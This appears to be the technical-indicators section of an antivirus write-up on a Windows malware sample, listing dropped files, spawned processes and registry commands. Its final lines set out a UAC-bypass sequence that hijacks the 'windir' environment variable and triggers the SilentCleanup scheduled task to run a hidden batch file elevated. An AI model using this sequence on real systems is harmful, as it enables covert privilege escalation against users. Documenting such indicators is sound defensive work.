Техническая информация
- %WINDIR%\syswow64\notepad.exe
- %TEMP%\gtaeusq.exe
- %TEMP%\gtae
- C:\users\public\cde.bat
- C:\users\public\x.bat
- C:\users\public\x.vbs
- C:\users\public\natso.bat
- C:\users\public\x.bat
- C:\users\public\natso.bat
- C:\users\public\cde.bat
- C:\users\public\x.vbs
- ClassName: 'EDIT' WindowName: ''
- '%TEMP%\gtaeusq.exe'
- '%WINDIR%\syswow64\cmd.exe' /c C:\Users\Public\Natso.bat' (со скрытым окном)
- '%WINDIR%\syswow64\notepad.exe'
- '%WINDIR%\syswow64\cmd.exe' /c C:\Users\Public\Natso.bat
- '%WINDIR%\syswow64\reg.exe' delete hkcu\Environment /v windir /f
- '%WINDIR%\syswow64\reg.exe' add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
- '%WINDIR%\syswow64\schtasks.exe' /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I